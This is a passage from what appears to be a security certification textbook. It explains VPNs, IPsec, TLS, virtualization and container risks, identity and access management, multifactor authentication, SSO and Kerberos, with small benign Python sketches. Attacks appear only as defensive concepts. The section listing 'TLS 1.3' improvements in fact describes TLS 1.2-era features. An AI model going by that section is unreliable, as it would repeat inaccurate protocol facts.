isolates a specific portion of its public cloud
infrastructure to be provisioned for private use. How
does this differ from a standard private cloud? VPCs are
private clouds sourced over a third-party vendor
infrastructure rather than over an enterprise IT
infrastructure. Figure 8-14 illustrates this architecture.
Figure 8-14 Virtual Private Cloud
Virtual Private Network (VPN)
A virtual private network (VPN) allows external
devices to access an internal network by creating a
tunnel over the Internet. Traffic that passes through the
VPN tunnel is encrypted and protected. An example of a
network with a VPN is shown in Figure 8-15. In a VPN
deployment, only computers that have the VPN client
and are able to authenticate will be able to connect to the
internal resources through the VPN concentrator.
Figure 8-15 VPN
VPN connections use an untrusted carrier network but
provide protection of the information through strong
authentication protocols and encryption mechanisms.
While we typically use the most untrusted network, the
Internet, as the classic example, and most VPNs do travel
through the Internet, a VPN can be used with interior
networks as well whenever traffic needs to be protected
from prying eyes.
In VPN operations, entire protocols wrap around other
protocols when this process occurs. They include
• A LAN protocol (required)
• A remote access or line protocol (required)
• An authentication protocol (optional)
• An encryption protocol (optional)
A device that terminates multiple VPN connections is
called a VPN concentrator. VPN concentrators
incorporate the most advanced encryption and
authentication techniques available.
In some instances, VLANs in a VPN solution may not be
supported by the ISP if they are also using VLANs in
their internal network. Choosing a provider that
provisions Multiprotocol Label Switching (MPLS)
connections can allow customers to establish VLANs to
other sites. MPLS provides VPN services with address
and routing separation between VPNs.
VPN connections can be used to provide remote access to
teleworkers or traveling users (called remote-access
VPNs) and can also be used to securely connect two
locations (called site-to-site VPNs). The implementation
process is conceptually different for these two VPN types.
In a remote-access VPN, the tunnel that is created has as
its endpoints the user’s computer and the VPN
concentrator. In this case, only traffic traveling from the
user computer to the VPN concentrator uses this tunnel.
In the case of two office locations, the tunnel endpoints
are the two VPN routers, one in each office. With this
configuration, all traffic that goes between the offices
uses the tunnel, regardless of the source or destination.
The endpoints are defined during the creation of the
VPN connection and thus must be set correctly according
to the type of remote-access link being used.
Two protocols commonly used to create VPN
connections are IPsec and SSL/TLS. The next section
discusses these two protocols.
IPsec
Internet Protocol Security (IPsec) is a suite of protocols
used in various combinations to secure VPN connections.
Although it provides other services, it is at heart an
encryption protocol. Before we look at IPsec, let's look at several
remote-access or line protocols (tunneling protocols)
used to create VPN connections, including
• Point-to-Point Tunneling Protocol (PPTP):
PPTP is a Microsoft protocol based on PPP. It uses
built-in Microsoft Point-to-Point encryption and
can use a number of authentication methods,
including CHAP, MS-CHAP, and EAP-TLS. One
shortcoming of PPTP is that it only works on IP-based networks. If a WAN connection that is not
IP based is in use, L2TP must be used.
• Layer 2 Tunneling Protocol (L2TP): L2TP is
a newer protocol that operates at Layer 2 of the
OSI model. Like PPTP, L2TP can use various
authentication mechanisms; however, L2TP does
not provide any encryption. It is typically used
with IPsec, which is a very strong encryption
mechanism.
When using PPTP, the encryption is included, and the
only remaining choice to be made is the authentication
protocol. When using L2TP, both encryption and
authentication protocols, if desired, must be added.
IPsec can provide encryption, data integrity, and system-based authentication, which makes it a flexible and
capable option. By implementing certain parts of the
IPsec suite, you can either use these features or not.
Internet Protocol Security (IPsec) includes the
following components:
• Authentication Header (AH): AH provides
data integrity, data origin authentication, and
protection from replay attacks.
• Encapsulating Security Payload (ESP):
ESP provides all that AH does as well as data
confidentiality.
• Internet Security Association and Key
Management Protocol (ISAKMP): ISAKMP
handles the creation of a security association (SA)
for the session and the exchange of keys.
• Internet Key Exchange (IKEv2): Also
sometimes referred to as IPsec Key Exchange, IKE
provides the authentication material used to
create the keys exchanged by ISAKMP during peer
authentication. This function was originally proposed
to be performed by a protocol called Oakley, which
relied on the Diffie-Hellman algorithm, but Oakley
has been superseded by IKEv2.
IPsec is a framework, which means it does not specify
many of the components used with it. These components
must be identified in the configuration, and they must
match in order for the two ends to successfully create the
required SA that must be in place before any data is
transferred. The following selections must be made:
• The encryption algorithm, which encrypts the data
• The hashing algorithm, which ensures that the
data has not been altered and verifies its origin
• The mode, which is either tunnel or transport
• The protocol, which can be AH, ESP, or both
All these settings must match on both ends of the
connection. It is not possible for the systems to select
these on the fly. They must be preconfigured correctly in
order to match.
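The following minimal Python sketch illustrates this "must match" requirement; the transform-set values are illustrative only:

# Both peers must be configured with matching selections before the
# SA can form; the values below are illustrative only.
local_peer = {"encryption": "AES-256", "hash": "SHA-256",
              "mode": "tunnel", "protocol": "ESP"}
remote_peer = {"encryption": "AES-256", "hash": "SHA-256",
               "mode": "tunnel", "protocol": "ESP"}

def sa_can_form(a, b):
    """The peers cannot negotiate these values on the fly; every
    parameter must match exactly or the SA is never established."""
    mismatches = {k for k in a if a[k] != b[k]}
    return not mismatches, mismatches

ok, bad = sa_can_form(local_peer, remote_peer)
print("SA established" if ok else f"IKE negotiation fails on: {sorted(bad)}")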
When configured in tunnel mode, the tunnel exists only
between the two gateways, but all traffic that passes
through the tunnel is protected. This is normally done to
protect all traffic between two offices. The SA is between
the gateways between the offices. This is the type of
connection that would be called a site-to-site VPN.
The SA between the two endpoints is made up of the
security parameter index (SPI) and the AH/ESP
combination. The SPI, a value contained in each IPsec
header, helps the devices maintain the relationship
between each SA (and there could be several happening
at once) and the security parameters (also called the
transform set) used for each SA.
Each session has a unique session value, which helps
prevent
• Reverse engineering
• Content modification
• Factoring attacks (in which the attacker attempts
to factor the large numbers used by the algorithm
in order to recover keys and decrypt ciphertext)
With respect to authenticating the connection, the keys
can be preshared or derived from a public key
infrastructure (PKI). A PKI creates public/private key
pairs that are associated with individual users and
computers that use a certificate. These key pairs are used
in the place of preshared keys in that case. Certificates
that are not derived from a PKI can also be used.
In transport mode, the SA is either between two end
stations or between an end station and a gateway or
remote access server. In this mode, the tunnel extends
from computer to computer or from computer to
gateway. This is the type of connection that would be
used for a remote-access VPN. This is but one
application of IPsec.
When the communication is from gateway to gateway or
host to gateway, either transport or tunnel mode may be
used. If the communication is computer to computer,
transport mode is required. When using transport mode
from gateway to host, the gateway must operate as a
host.
The most effective attack against an IPsec VPN is a man-in-the-middle attack. In this attack, the attacker proceeds
through the security negotiation phase until the key
negotiation, when the victim reveals its identity. In a
well-implemented system, the attack fails when the
attacker cannot likewise prove his identity.
SSL/TLS
Secure Sockets Layer (SSL)/Transport Layer
Security (TLS) is another option for creating VPNs.
Although SSL has largely been replaced by its
successor, TLS, it is still common to hear such a
connection referred to as an SSL connection. It works at the
application layer of the OSI model and is used mainly to
protect HTTP traffic or web servers. Its functionality is
embedded in most browsers, and its use typically
requires no action on the part of the user. It is widely
used to secure Internet transactions. It can be
implemented in two ways:
• SSL/TLS portal VPN: In this case, a user has a
single SSL/TLS connection for accessing multiple
services on the web server. Once authenticated,
the user is provided a page that acts as a portal to
other services.
• SSL/TLS tunnel VPN: A user may use an
SSL/TLS tunnel to access services on a server that
is not a web server. This solution uses custom
programming to provide access to non-web
services through a web browser.
TLS and SSL are very similar but not the same.
When configuring SSL/TLS, a session key length must be
designated; historically, the two options were 40-bit and 128-bit.
Using CA-signed (rather than self-signed) certificates to
authenticate the server's public key helps prevent
man-in-the-middle attacks.
SSL/TLS is often used to protect other protocols. FTPS,
for example, uses SSL/TLS to secure file transfers between
hosts (SCP, by contrast, relies on SSH). Table 8-2 lists some
of the advantages and disadvantages of SSL/TLS.
Table 8-2 Advantages and Disadvantages of
SSL/TLS
When placing the SSL/TLS gateway, you must consider a
trade-off: The closer the gateway is to the edge of the
network, the less encryption that needs to be performed
in the LAN (and the less performance degradation), but
the closer to the network edge it is placed, the farther the
traffic travels through the LAN in the clear. The decision
comes down to how much you trust your internal
network.
The latest version of TLS is version 1.3, which provides
access to advanced cipher suites that support elliptic
curve cryptography and AEAD block cipher modes. TLS
has been improved to support the following:
• Hash negotiation: Can negotiate any hash
algorithm to be used as a built-in feature, and the
default cipher pair MD5/SHA-1 has been replaced
with SHA-256.
• Certificate hash or signature control: Can
configure the certificate requester to accept only
specified hash or signature algorithm pairs in the
certification path.
• Suite B–compliant cipher suites: Two cipher
suites have been added so that the use of TLS can
be Suite B compliant:
• TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
• TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
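As an illustration, the following minimal Python sketch (using the standard library ssl module) builds a client context that refuses anything older than TLS 1.3, so only modern AEAD cipher suites can be negotiated; the hostname is just an example:

import socket
import ssl

# Build a client context that refuses anything older than TLS 1.3,
# so only modern AEAD cipher suites can be negotiated.
ctx = ssl.create_default_context()  # also verifies the server certificate
ctx.minimum_version = ssl.TLSVersion.TLSv1_3

with socket.create_connection(("www.example.com", 443)) as sock:
    with ctx.wrap_socket(sock, server_hostname="www.example.com") as tls:
        print(tls.version())  # e.g., 'TLSv1.3'
        print(tls.cipher())   # the negotiated cipher suite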
Serverless
A serverless architecture is one in which the servers
that run application code are abstracted away from the developer. In this model,
applications are hosted by a third-party service,
eliminating the need for server software and hardware
management by the developer. Applications are broken
up into individual functions that can be invoked and
scaled individually. Function as a Service (FaaS), another
name for serverless architecture, was discussed in
Chapter 6.
CHANGE MANAGEMENT
All networks evolve, grow, and change over time.
Companies and their processes also evolve and change,
which is a good thing. But infrastructure change must be
managed in a structured way so as to maintain a
common sense of purpose about the changes. By
following recommended steps in a formal change
management process, change can be prevented from
becoming the tail that wags the dog. The following are
guidelines to include as a part of any change
management policy:
• All changes should be formally requested.
• Each request should be analyzed to ensure it
supports all goals and policies.
• Prior to formal approval, all costs and effects of
the methods of implementation should be
reviewed.
• After they’re approved, the change steps should be
developed.
• During implementation, incremental testing
should occur, relying on a predetermined fallback
strategy if necessary.
• Complete documentation should be produced and
submitted with a formal report to management.
One of the key benefits of following this change
management method is the ability to make use of the
documentation in future planning. Lessons learned can
be applied, and even the process itself can be improved
through analysis.
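The ordered nature of the process can even be enforced in tooling. The following minimal Python sketch models a change request that must pass through each step in sequence; the state names are illustrative and not taken from any particular change management product:

# Illustrative state names; not taken from any particular product.
WORKFLOW = ["requested", "analyzed", "reviewed", "approved",
            "steps_developed", "tested", "documented"]

class ChangeRequest:
    def __init__(self, description):
        self.description = description
        self.state = "requested"

    def advance(self, new_state):
        """Allow only the next step in the formal process, so a change
        cannot jump from request straight to implementation."""
        expected = WORKFLOW[WORKFLOW.index(self.state) + 1]
        if new_state != expected:
            raise ValueError(f"cannot move to {new_state!r}; next step is {expected!r}")
        self.state = new_state

cr = ChangeRequest("Open TCP 8443 on the extranet firewall")
cr.advance("analyzed")
cr.advance("reviewed")
cr.advance("approved")  # only now may the change steps be developed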
VIRTUALIZATION
Multiple physical servers are increasingly being
consolidated to a single physical device or hosted as
virtual servers. It is even possible to have entire virtual
networks residing on these hosts. While it may seem that
these devices are safely contained on the physical
devices, they are still vulnerable to attack. If a host is
compromised or a hypervisor that manages virtualization
is compromised, an attack on the virtual machines (VMs)
could ensue.
Security Advantages and
Disadvantages of Virtualization
Virtualization of servers has become a key part of
reducing the physical footprint of data centers. The
advantages include
• Reduced overall use of power in the data center
• Dynamic allocation of memory and CPU resources
to the servers
• High availability provided by the ability to quickly
bring up a replica server in the event of loss of the
primary server
However, most of the same security issues that must be
mitigated in the physical environment must also be
addressed in the virtual network. In a virtual
environment, instances of an operating system are
virtual machines. A host system can contain many VMs.
Software called a hypervisor manages the distribution of
resources (CPU, memory, and disk) to the VMs. Figure
8-16 shows the relationship between the host machine,
its physical resources, the resident VMs, and the virtual
resources assigned to them.
Figure 8-16 Virtualization
Keep in mind that in any virtual environment, each
virtual server that is hosted on the physical server must
be configured with its own security mechanisms. These
mechanisms include antivirus and anti-malware
software and all the latest patches and security updates
for all the software hosted on the virtual machine. Also,
remember that all the virtual servers share the resources
of the physical device.
When virtualization is hosted on a Linux machine, any
sensitive application that must be installed on the host
should be installed in a chroot environment. A chroot on
Unix-based operating systems is an operation that
changes the root directory for the current running
process and its children. A program that is run in such a
modified environment cannot name (and therefore
normally cannot access) files outside the designated
directory tree.
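Here is a minimal Python sketch of launching a process inside a chroot jail. It runs only on Unix-like systems, requires root privileges, and assumes the hypothetical directory /srv/jail has been pre-populated with everything the program needs (binaries, shared libraries, and so on):

import os

def run_in_chroot(jail_dir, program, args):
    """Fork a child, confine it to the jail, and exec the program;
    the program path is interpreted relative to the new root."""
    pid = os.fork()
    if pid == 0:                 # child process
        os.chroot(jail_dir)      # "/" now refers to the jail
        os.chdir("/")
        os.execv(program, [program] + args)
    os.waitpid(pid, 0)           # parent waits for the jailed child

# /srv/jail is hypothetical and must already contain /bin/ls and its
# shared libraries; this call requires root privileges.
run_in_chroot("/srv/jail", "/bin/ls", ["-l"])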
Type 1 vs. Type 2 Hypervisors
The hypervisor that manages the distribution of the
physical server’s resources can be either Type 1 or Type
2:
• Type 1 hypervisor: A Type 1 (bare-metal)
hypervisor runs directly on the host hardware, and
guest operating systems run on the level above the
hypervisor. Examples of Type 1 hypervisors are Citrix
XenServer, Microsoft Hyper-V, and VMware
vSphere.
• Type 2 hypervisor: A Type 2 hypervisor runs
within a conventional operating system
environment. With the hypervisor layer as a
distinct second software level, guest operating
systems run at the third level above the hardware.
VMware Workstation and Oracle VM VirtualBox
exemplify Type 2 hypervisors.
Figure 8-17 shows a comparison of the two approaches.
Figure 8-17 Hypervisor Types
Virtualization Attacks and
Vulnerabilities
Virtualization attacks and vulnerabilities fall into the
following categories:
• VM escape: This type of attack occurs when a
guest OS escapes from its VM encapsulation to
interact directly with the hypervisor. This can
allow access to all VMs and the host machine as
well. Figure 8-18 illustrates an example of this
attack.
Figure 8-18 VM Escape
• Unsecured VM migration: This type of attack
occurs when a VM is migrated to a new host and
security policies and configuration are not
updated to reflect the change.
• Host and guest vulnerabilities: Host and
guest interactions can magnify system
vulnerabilities. The operating systems on both the
host and the guest systems can suffer the same
issues as those on all physical devices. For that
reason, both guest and host operating systems
should always have the latest security patches and
should have antivirus and anti-malware software
installed and up to date. All other principles of
hardening the operating system should also be
followed, including disabling unneeded services
and disabling unneeded accounts.
• VM sprawl: More VMs create more failure
points, and sprawl can cause problems even if no
malice is involved. Sprawl occurs when the
number of VMs grows over time to an
unmanageable number. As this occurs, the ability
of the administrator to keep up with them is
slowly diminished.
• Hypervisor attack: This type of attack involves
taking control of the hypervisor to gain access to
the VMs and their data. While these attacks are
rare due to the difficulty of directly accessing
hypervisors, administrators should plan for them.
• Data remnants: Sensitive data inadvertently
replicated in VMs as a result of cloud maintenance
functions or remnant data left in terminated VMs
needs to be protected. Also, if data is moved,
residual data may be left behind, accessible to
unauthorized users. Any remaining data in the old
location should be shredded, but depending on
the security practice, data remnants may remain.
This can be a concern with confidential data in
private clouds and any sensitive data in public
clouds. Commercial products can deal with data
remnants. For example, Blancco is a product that
permanently removes data from PCs, servers, data
center equipment, and smart phones. Data erased
by Blancco cannot be recovered with any existing
technology. Blancco also creates a report to prove
each erasure for compliance purposes.
Virtual Networks
A virtual infrastructure usually contains virtual switches
that connect to the physical switches in the network. You
should ensure that traffic from the physical network to
the virtual network is tightly controlled. Remember that
virtual machines run operating systems that are
vulnerable to the same attacks as those on physical
machines. Also, the same type of network attacks and
scanning can be done if there is access to the virtual
network.
Management Interface
Some vulnerability exists in the management interface to
the hypervisor. The danger here is that this interface
typically provides access to the entire virtual
infrastructure. The following are some of the attacks
through this interface:
• Privilege elevation: In some cases, the dangers
of privilege elevation or escalation in a virtualized
environment may be equal to or greater than
those in a physical environment. When the
hypervisor is performing its duty of handling calls
between the guest operating system and the
hardware, any flaws introduced to those calls
could allow an attacker to escalate privileges in
the guest operating system. An example of a flaw
in VMware ESX Server, Workstation, Fusion, and
View products could have led to escalation on the
host. VMware reacted quickly to fix this flaw with
a security update. The key to preventing privilege
escalation is to make sure all virtualization
products have the latest updates and patches.
• Live VM migration: One of the advantages of a
virtualized environment is the ability of the
system to migrate a VM from one host to another
when needed, called a live migration. When VMs
are on the network between secured perimeters,
attackers can exploit network vulnerabilities to
gain unauthorized access to VMs. With access to
the VM images, attackers can plant malicious code
in the images to stage attacks on the data centers
that VMs travel between. Often the protocols used
for the migration are not encrypted, making a
man-in-the-middle attack in the VM possible
while it is in transit, as shown in Figure 8-19. The
key to preventing man-in-the-middle attacks is
encrypting the images both where they are stored and while in transit.
Figure 8-19 Man-in-the-Middle Attack
Vulnerabilities Associated with a
Single Physical Server Hosting
Multiple Companies’ Virtual
Machines
In some virtualization deployments, a single physical
server hosts multiple organizations’ VMs. All the VMs
hosted on a single physical computer must share the
resources of that physical server. If the physical server
crashes or is compromised, all the organizations that
have VMs on that physical server are affected. User
access to the VMs should be properly configured,
managed, and audited. Appropriate security controls,
including antivirus, anti-malware, ACLs, and auditing,
must be implemented on each of the VMs to ensure that
each one is properly protected. Other risks to consider
include physical server resource depletion, network
resource performance, and traffic filtering between
virtual machines.
Driven mainly by cost, many companies outsource to
cloud providers computing jobs that require a large
number of processor cycles for a short duration. This
situation allows a company to avoid a large investment in
computing resources that will be used for only a short
time. Assuming that the provisioned resources are
dedicated to a single company, the main vulnerability
associated with on-demand provisioning is traces of
proprietary data that can remain on the virtual machine
and may be exploited.
Let’s look at an example. Say that a security architect is
seeking to outsource company server resources to a
commercial cloud service provider. The provider under
consideration has a reputation for poorly controlling
physical access to data centers and has been the victim of
social engineering attacks. The service provider regularly
assigns VMs from multiple clients to the same physical
resource. When conducting the final risk assessment, the
security architect should take into consideration the
likelihood that a malicious user will obtain proprietary
information by gaining local access to the hypervisor
platform.
Vulnerabilities Associated with a
Single Platform Hosting Multiple
Companies’ Virtual Machines
In some virtualization deployments, a single platform
hosts multiple organizations’ VMs. If all the servers that
host VMs use the same platform, attackers will find it
much easier to attack the other host servers once the
platform is discovered. For example, if all physical
servers use VMware to host VMs, any identified
vulnerabilities for that platform could be used on all host
computers. Other risks to consider include
misconfigured platforms, separation of duties, and
application of security policy to network interfaces. If an
administrator wants to virtualize the company’s web
servers, application servers, and database servers, the
following should be done to secure the virtual host
machines: only access hosts through a secure
management interface and restrict physical and network
access to the host console.
Virtual Desktop Infrastructure (VDI)
Virtual desktop infrastructure (VDI) hosts
desktop operating systems within a virtual environment
in a centralized server. Users access the desktops and run
them from the server. There are three models for
implementing VDI:
• Centralized model: All desktop instances are
stored in a single server, which requires
significant processing power on the server.
• Hosted model: Desktops are maintained by a
service provider. This model eliminates capital
cost and is instead considered operational cost.
• Remote virtual desktops model: An image is
copied to the local machine, which means a
constant network connection is unnecessary.
Figure 8-20 compares the remote virtual desktop models
(also called streaming) with centralized VDI.
Figure 8-20 VDI Streaming and Centralized VDI
Terminal Services/Application
Delivery Services
Just as operating systems can be provided on demand
with technologies like VDI, applications can also be
provided to users from a central location. Two models
can be used to implement this:
• Server-based application virtualization
(terminal services): In server-based
application virtualization, an application runs on
servers. Users receive the application
environment display through a remote client
protocol, such as Microsoft Remote Desktop
Protocol (RDP) or Citrix Independent Computing
Architecture (ICA). Examples of terminal services
include Remote Desktop Services and Citrix
Presentation Server.
• Client-based application virtualization
(application streaming): In client-based
application virtualization, the target application is
packaged and streamed to the client PC. It has its
own application computing environment that is
isolated from the client OS and other applications.
A representative example is Microsoft Application
Virtualization (App-V).
Figure 8-21 compares these two approaches.
Figure 8-21 Application Streaming and Terminal
Services
When using either of these technologies, you should
force the use of encryption, set limits to the connection
life, and strictly control access to the server. These
measures can prevent eavesdropping on any sensitive
information, especially the authentication process.
CONTAINERIZATION
A newer approach to server virtualization is referred to
as container-based virtualization, also called operating
system virtualization. Containerization is a technique
in which the kernel allows for multiple isolated user
space instances. The instances are known as containers,
virtual private servers, or virtual environments.
In this model, the hypervisor is replaced with operating
system–level virtualization. A virtual machine is not a
complete operating system instance but rather a partial
instance of the same operating system. The containers in
Figure 8-22 are the darker boxes just above the host OS
level. Container-based virtualization is used mostly in
Linux environments, and examples are the commercial
Parallels Virtuozzo and the open source OpenVZ project.
Figure 8-22 Container-based Virtualization
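As a quick illustration, the following minimal Python sketch launches an isolated user space instance with the Docker CLI (assuming Docker is installed); the image name is just an example. Each container shares the host's kernel but sees its own file system and process space, unlike a full VM:

import subprocess

def launch_isolated(image, command):
    """Run a command in a throwaway container; the container shares
    the host kernel but gets an isolated user space instance."""
    return subprocess.run(
        ["docker", "run", "--rm", image] + command,
        capture_output=True, text=True,
    )

result = launch_isolated("alpine", ["cat", "/etc/os-release"])
print(result.stdout)  # the container's user space, not the host's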
IDENTITY AND ACCESS
MANAGEMENT
This section describes how identity and access
management (IAM) work, why IAM is important, and
how IAM components and devices work together in an
enterprise. Access control allows only authorized users,
applications, devices, and systems to access enterprise
resources and information. It includes facilities, support
systems, information systems, network devices, and
personnel. Security practitioners must use access
controls to specify which users can access a resource,
which resources can be accessed, which operations can
be performed, and which actions will be monitored. Once
again, the CIA triad is important in providing enterprise
IAM. The three-step process used to set up a robust IAM
system is covered in the following sections.
Identify Resources
This first step in the access control process involves
defining all resources in the IT infrastructure by deciding
which entities need to be protected. When defining these
resources, you must also consider how the resources will
be accessed. The following questions can be used as a
starting point during resource identification:
• Will this information be accessed by members of
the general public?
• Should access to this information be restricted to
employees only?
• Should access to this information be restricted to a
smaller subset of employees?
Keep in mind that data, applications, services, servers,
and network devices are all considered resources.
Resources are any organizational asset that users can
access. In access control, resources are often referred to
as objects.
Identify Users
After identifying the resources, an organization should
identify the users who need access to the resources. A
typical security professional must manage multiple levels
of users who require access to organizational resources.
During this step, the goal is simply to identify the users;
the level of access these users will be given is
analyzed in the next step.
As part of this step, you must analyze and understand the
users’ needs and then measure the validity of those needs
against organizational needs, policies, legal issues, data
sensitivity, and risk.
Remember that any access control strategy and the
system deployed to enforce it should avoid complexity.
The more complex an access control system is, the
harder that system is to manage. In addition,
anticipating security issues that could occur in more
complex systems is much harder. As security
professionals, we must balance the organization’s
security needs and policies with the needs of the users. If
a security mechanism that we implement causes too
much difficulty for the user, the user might engage in
practices that subvert the mechanisms that we
implement. For example, if you implement a password
policy that requires a very long, complex password, users
might find remembering their passwords to be difficult.
Users might then write their passwords on sticky notes
that they then attach to their monitor or keyboard.
Identify Relationships Between
Resources and Users
The final step in the access control process is to define
the access control levels that need to be in place for each
resource and the relationships between the resources
and users. For example, if an organization has defined a
web server as a resource, general employees might need
a less restrictive level of access to the resource than the
level given to the public and a more restrictive level of
access to the resource than the level given to the web
development staff. Access controls should be designed to
support the business functionality of the resources that
are being protected. Controlling the actions that can be
performed for a specific resource based on a user’s role is
vital.
Privilege Management
When users are given the ability to do something that
typically only an administrator can do, they have been
granted privileges and their account becomes a
privileged account. The management of such accounts is
called privilege management and must be conducted
carefully because any privileges granted become tools
that can be used against your organization if an account
is compromised by a malicious individual.
An example of the use of privilege management is in the
use of attribute certificates (ACs) to hold user privileges
with the same object that authenticates them. So when
Sally uses her certificate to authenticate, she receives
privileges that are attributes of the certificate. This
architecture is called a privilege management
infrastructure.
Multifactor Authentication (MFA)
Identifying users and devices and determining the
actions permitted by a user or device forms the
foundation of access control models. While this
paradigm has not changed since the beginning of
network computing, the methods used to perform this
important set of functions have changed greatly and
continue to evolve. While simple usernames and
passwords once served the function of access control, in
today’s world, more sophisticated and secure methods
are developing quickly. Not only are such simple systems no longer secure, but the design of access credential systems today also emphasizes ease of use. Multifactor
authentication (MFA) is the use of more than a single
factor, such as a password, to authenticate someone. This
section covers multifactor authentication.
Authentication
To be able to access a resource, a user must prove her
identity, provide the necessary credentials, and have the
appropriate rights to perform the tasks she is
completing. This process has two parts:
• Identification: In the first part of the process, a
user professes an identity to an access control
system.
• Authentication: The second part of the process
involves validating a user with a unique identifier
by providing the appropriate credentials.
When trying to differentiate between these two parts,
security professionals should know that identification
identifies the user, and authentication verifies that the
identity provided by the user is valid. Authentication is
usually implemented through a user password provided
at login. The login process should validate the login after
all the input data is supplied. The most popular forms of
user identification include user IDs or user accounts,
account numbers, and personal identification numbers
(PINs).
Authentication Factors
Once the user identification method has been
established, an organization must decide which
authentication method to use. Authentication methods
are divided into five broad categories:
• Knowledge factor authentication: Something
a person knows
• Ownership factor authentication: Something
a person has
• Characteristic factor authentication:
Something a person is
• Location factor authentication: Somewhere a
person is
• Action factor authentication: Something a
person does
Authentication usually ensures that a user provides at
least one factor from these categories, which is referred
to as single-factor authentication. An example of this
would be providing a username and password at login.
Two-factor authentication ensures that the user provides factors from two of these categories. An example of two-factor authentication would be providing a username, password, and smart card at login. Three-factor authentication ensures that a user provides factors from three different categories.
An example of three-factor authentication would be
providing a username, password, smart card, and
fingerprint at login. For authentication to be considered
strong authentication, a user must provide factors from
at least two different categories. (Note that the username
is the identification factor, not an authentication factor.)
You should understand that providing multiple
authentication factors from the same category is still
considered single-factor authentication. For example, if a
user provides a username, password, and the user’s
mother’s maiden name, single-factor authentication is
being used. In this example, the user is still only
providing factors that are something a person knows.
Knowledge Factors
As previously described in brief, knowledge factor
authentication is authentication that is provided
based on something a person knows. This type of
authentication is referred to as a Type I authentication
factor. While the most popular form of authentication
used by this category is password authentication, other
knowledge factors can be used, including date of birth,
mother’s maiden name, key combination, or PIN.
Ownership Factors
Ownership factor authentication is authentication
that is provided based on something that a person has.
This type of authentication is referred to as a Type II
authentication factor. Ownership factors can include the
following:
• Token devices: A token device is a handheld device that presents the authentication server with a one-time password. If the authentication method requires a token device, the user must be in physical possession of the device to authenticate. So although the token device provides a password to the authentication server, the token device is considered a Type II authentication factor because its use requires ownership of the device. (A minimal sketch of how such one-time passwords can be generated follows this list.) A token device is usually implemented only in very secure environments because of the cost of deploying the token devices. In addition, token-based solutions can experience problems because of the battery life span of the token device.
• Memory cards: A memory card is a swipe card
that is issued to a valid user. The card contains
user authentication information. When the card is
swiped through a card reader, the information
stored on the card is compared to the information
that the user enters. If the information matches,
the authentication server approves the login. If it
does not match, authentication is denied. Because
the card must be read by a card reader, each
computer or access device must have its own card
reader. In addition, the cards must be created and
programmed. Both of these steps add complexity
and cost to the authentication process, although the added security that memory cards provide is often worth the extra complexity and cost. However, the data on the memory cards is not protected, a weakness that organizations should consider before implementing this type of system. Memory-only cards are very easy to counterfeit.
• Smart cards: A smart card accepts, stores, and
sends data but can hold more data than a memory
card. Smart cards, often known as integrated
circuit cards (ICCs), contain memory like memory
cards but also contain embedded chips like bank
or credit cards. Smart cards use card readers.
However, the data on a smart card is used by the
authentication server without user input. To
protect against lost or stolen smart cards, most
implementations require the user to input a secret
PIN, meaning the user is actually providing both
Type I (PIN) and Type II (smart card)
authentication factors.
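The one-time passwords produced by many token devices follow the time-based one-time password (TOTP) scheme standardized in RFC 6238. The following Python sketch shows the idea using only the standard library; the Base32 secret is a made-up example, not a real key:

import base64
import hmac
import struct
import time

def totp(secret_b32: str, period: int = 30, digits: int = 6) -> str:
    # RFC 6238: HMAC a time-step counter with the shared secret.
    key = base64.b32decode(secret_b32)
    counter = int(time.time()) // period          # 30-second time step
    msg = struct.pack(">Q", counter)              # 8-byte big-endian counter
    digest = hmac.new(key, msg, "sha1").digest()
    offset = digest[-1] & 0x0F                    # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # hypothetical shared secret

Because the code depends on possession of the shared secret inside the device, it serves as a Type II factor even though what the user types looks like a password.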
Characteristic Factors
Characteristic factor authentication is
authentication that is provided based on something a
person is. This type of authentication is referred to as a
Type III authentication factor. Biometric technology is
the technology that allows users to be authenticated
based on physiological or behavioral characteristics.
Physiological characteristics include any unique physical
attribute of the user, including iris, retina, and
fingerprints. Behavioral characteristics measure a
person’s actions in a situation, including voice patterns
and data entry characteristics.
Single Sign-On (SSO)
In an effort to make users more productive, several
solutions have been developed to allow users to use a
single password for all functions and to use these same
credentials to access resources in external organizations.
These concepts are called single sign-on (SSO) and
identity verification based on federations. The following
section looks at these concepts and their security issues.
In an SSO environment, a user enters his login
credentials once and can access all resources in the
network. The Open Group Security Forum has defined
many objectives for an SSO system. Some of the
objectives for the user sign-on interface and user account
management include the following:
• The interface should be independent of the type of
authentication information handled.
• The creation, deletion, and modification of user
accounts should be supported.
• Support should be provided for a user to establish
a default user profile.
• Accounts should be independent of any platform
or operating system.
Note
To obtain more information about the Open Group’s Single Sign-On Standard,
visit http://www.opengroup.org/security/sso_scope.htm.
SSO offers both advantages and disadvantages when it is implemented.
Advantages of an SSO system include the following:
• Users are able to use stronger passwords.
• User and password administration is simplified.
• Resource access is much faster.
• User login is more efficient.
• Users need to remember the login credentials for only a single system.
Disadvantages of an SSO system include the following:
• After a user obtains system access through the
initial SSO login, the user is able to access all
resources to which he is granted access. Although
this is also an advantage for the user (only one
login needed), it is also considered a disadvantage
because only one sign-on by an adversary can
compromise all the systems that participate in the
SSO network.
• If a user’s credentials are compromised, attackers
will have access to all resources to which the user
has access.
Although the discussion of SSO so far has been mainly
about how it is used for networks and domains, SSO can
also be implemented in web-based systems. Enterprise
access management (EAM) provides access control
management for web-based enterprise systems. Its
functions include accommodation of a variety of
authentication methods and role-based access control.
SSO can be implemented in Kerberos, SESAME, and
federated identity management environments. Security
domains can then be established to assign SSO rights to
resources.
Kerberos
Kerberos is an authentication protocol that uses a
client/server model developed by MIT’s Project Athena.
It is the default authentication model in the recent
editions of Windows Server and is also used in Apple,
Oracle, and Linux operating systems.
Kerberos is an SSO system that uses symmetric key
cryptography. Kerberos provides confidentiality and
integrity. Kerberos assumes that messaging, cabling, and
client computers are not secure and are easily accessible.
In a Kerberos exchange involving a message with an
authenticator, the authenticator contains the client ID
and a timestamp. Because a Kerberos ticket is valid for a
certain time, the timestamp ensures the validity of the
request.
In a Kerberos environment, the key distribution center
(KDC) is the repository for all user and service secret
keys. The process of authentication and subsequent
access to resources is as follows:
1. The client sends a request to the authentication
server (AS), which might or might not be the KDC.
2. The AS forwards the client credentials to the KDC.
3. The KDC authenticates clients to other entities on a
network and facilitates communication using
session keys. The KDC provides security to clients
or principals, which are users, network services,
and software. Each principal must have an account
on the KDC.
